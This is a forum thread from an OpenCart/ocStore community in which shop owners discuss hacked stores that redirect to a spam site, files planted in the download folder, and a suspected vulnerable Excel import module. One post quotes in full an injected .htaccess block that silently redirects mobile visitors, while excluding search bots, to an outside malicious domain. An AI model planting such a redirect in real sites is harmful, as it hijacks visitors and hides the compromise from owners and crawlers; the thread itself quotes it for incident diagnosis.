Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Появилась переадресация на mysafemedz.com, что это?


vector

Recommended Posts

Добрый день! Подскажите, откуда появилась переадресация на какой-то непонятный сайт mysafemedz. com

из вместо ссылок на страницы:

1). О нас

2). Информация о доставке

3). Условия соглашения

4). Наши партнёры

5). Как нас найти

Все эти страницы создаются в разделе Каталог->Статьи

Пытался переименовать ссылки в админке на эти страницы, но история таже. Или на сайт или ошибка 502 Bad Gateway.

Надіслати
Поділитися на інших сайтах


Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

  • +1 2
Надіслати
Поділитися на інших сайтах

одновременно было взломано куча сайтов, на разных хостингах...

у многих было перенаправление на этот сайт mysafemedz. com

у меня тоже дня 3-4 назад..

 

был изменен файл htacsess

и в папке dawnoad была куча файлов всяких разных.

 

заменил пароли все, файлы удалил,

файл htacсess изменил на новый.

 

Сегодня хостер отключил сайты. Говорит спамят....((

 

что делать, где искать..?

айболитом сайт проверял - показывал вредоносный файл где то здесь

php excel - не знаю что с ним не так и где искать..

теперь айболит не работает (((

Хостер не включит сайт пока все проблемы не решу..

Надіслати
Поділитися на інших сайтах


У меня такая же беда. Ко всему вышесказанному добавлю еще, что в админке в Загрузках лежит файл info.php3.9ff4d3f2cd9c13d89382e0475b291494. Нужно копаться в файлах загруженных в папку download. К сожалению я ее случайно удалил.

Надіслати
Поділитися на інших сайтах


Вот еще админ хостера прислал:

/docs/system/PHPExcel/Classes/PHPExcel

 

как я и говорил - айболит показывал тоже самое,

это модуль эксель импрот экспрот - только какой не помню - найду напишу.

 

Копец модули получается качать тоже нельзя? )) я их только с этого сайта беру...

Надіслати
Поділитися на інших сайтах


Вот файл что качал и устанваливал:

 

export-import-xls-OCSTORE - 1.5.4.1

 

ссылка https://opencartforum.com/files/file/687-eksport-import-export-import-xls-dlia-ocstore-1541/

 

получается либо файл изначально с кодом,

либо в нем уязвимость и потом код там появляется?

Надіслати
Поділитися на інших сайтах


Похоже, что эпидемия!!

На другом моем сайта, у другого хостера ocstore 1.5.4.1 в папке download

файл 404.php.393f651a5afbd676aa7e4202d08ea292. Прикрепляю.

А в .htaccess добавлено:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://skriptogram.ru/?i=2043&l=1 [L,R=302]
#########!rataman!#########

Проверил остальные свои сайты. Пока чистые.

Надіслати
Поділитися на інших сайтах


Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

У меня было такое поганое настроение, пока я не прочел Ваш комментарий, спасибо  :-D 

Надіслати
Поділитися на інших сайтах

За эту неделю нашёл по просьбе эту бяку в трёх магазинах.В основном переписывается  htaccsess.

  • +1 2
Надіслати
Поділитися на інших сайтах

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с такой-же проблемой, рассылал спам, в папке download лежали веселые файлики

 

Если вы видите что к вам загрузили скрипты не относящиеся к opencart это говорит о том что вашем сайте есть уязвимость через которую злоумышленник может сделать с вашими файлами все что угодно. И пока уязвимость не будет устранена, вам будут загружать вредоносный код. Самый простой способ не допустить этого проверяйте все файлы которые вы скачиваете с интернета, в частности шаблоны которые были украдены и выложены в свободный доступ, а также различные модули. В данном случае лучше удалить все файлы и заново установить opencart, предварительно скачав картинки и дамп базы данных. Так как уязвимость может быть замаскирована под обычный код и не профессионал вряд ли его обнаружит.

Надіслати
Поділитися на інших сайтах


  • 5 weeks later...

Всем привет.

У меня на одном хостинге, два магазина, один тестовый, другой нормальный. У тестового пароль и логин admin. Так вот, захожу сегодня на хостинг, смотрю в корневую директорию, а там куча новых папок, с короткими названиями, типа kuy, lg и тп. В этих папках txt ридми фалы и html файлы, открыл html фаил, он ведет на американский сайт

  рекламирующий добавки и средства для похудания. Тестовый магазин, сегодня быстренько снес.

Самое интересное, что реальный магазин не тронули, ломанули только тестовый. Может потому что у меня там стоял стандартный шаблон Opencart, а в нем описание товаров на английском, амерские хакеры наверно подумали, что это крутой магазин, торгующий электроникой))
Посмотрел, на посетителей, реального инет магазина, было два посетителя, один с Канады, другой с США. Видать и его пытались ломануть, но пароль к админке не смогли подобрать.

Я вот только не пойму, как они магазин ломанули, неужели через админку? Теперь наверно и от хостинга пароль придется менять.

Надіслати
Поділитися на інших сайтах


  • 1 year later...

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить? А как восстановить htaccess? У меня таких файла три штуки в разных папках. Что с ними сделать надо?

Надіслати
Поділитися на інших сайтах


для начала надо разобраться, что за файлы.

htaccess - без излишеств можно взять из архива используемой версии движка.

но если добавляли в него правила/настройки - НЕЛЬЗЯ бездумно перезаписывать свой файл оригинальным.

Надіслати
Поділитися на інших сайтах

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить?

удаляйте, не удаляйте, через пару дней они там снова будут.

 

А как восстановить htaccess?

с чего вы взяли, что файл изменен?

Надіслати
Поділитися на інших сайтах

Ок. Вот мои три файла htaccess

 

вот, который в VQMOD:

 

# Prevent Directoy listing
Options -Indexes

<FilesMatch "\.(xml|cache)">
Order deny,allow
Deny from all
</FilesMatch>

 

Вот который в html public

(только я там заменила кое-что на ----------, т.к. не знаю, можно ли это выкладывать.)

 

# 1.To use URL Alias you need to be running apache with mod_rewrite enabled.

# 2. In your opencart directory rename htaccess.txt to .htaccess.

# For any support issues please visit: http://www.opencart.com

Options +FollowSymlinks

# Prevent Directoy listing
Options -Indexes

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
Order deny,allow
Deny from all
</FilesMatch>

# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/

RewriteBase /
RewriteRule ^sitem----------------------------------------------------------------------
RewriteRule ^goo------------------------------------------------------------------------
RewriteRule ^dow-----------------------------------------------------------------------
RewriteCond %--------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteRule ^([-------------------------------------------------------------------------

### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off

# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off

# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M

# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M

# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200

# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200

# 7. disable open_basedir limitations
# php_admin_value open_basedir none

 

А вот, который в /public_html/admin/view/javascript/ckeditor/.htaccess

 

#

# Copyright © 2003-2012, CKSource - Frederico Knabben. All rights reserved.
# For licensing, see LICENSE.html or http://ckeditor.com/license
#

#
# On some specific Linux installations you could face problems with Firefox.
# It could give you errors when loading the editor saying that some illegal
# characters were found (three strange chars in the beginning of the file).
# This could happen if you map the .js or .css files to PHP, for example.
#
# Those characters are the Byte Order Mask (BOM) of the Unicode encoded files.
# All FCKeditor files are Unicode encoded.
#

AddType application/x-javascript .js
AddType text/css .css

#
# If PHP is mapped to handle XML files, you could have some issues. The
# following will disable it.
#

AddType text/xml .xml

 

 

Можете ли вы, уважаемые знатоки, глянуть - они правильные или нет?

Спасибо.

Надіслати
Поділитися на інших сайтах


Я посмотрела на куки, которые создаются при отображении моей страницы, и обнаружила, что записываются куки с эдак так 20 сайтов! Там есть и Алибаба, и Алиэкспресс, и Мегого.ру, и 777...ру и много другого. А еще через "Отображение кода страницы" в браузере я вижу, что при отображении сайта идет обращение только с моему сайту (мое доменное имя) и один раз в стороннему виджету "101виджет".

Правильно ли я понимаю, что надо убрать и этот 101виджет. А далее смотреть: если куки появятся заново - то баг где-то именно в коде сайта, а не на стороне?

Ход правильный?

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.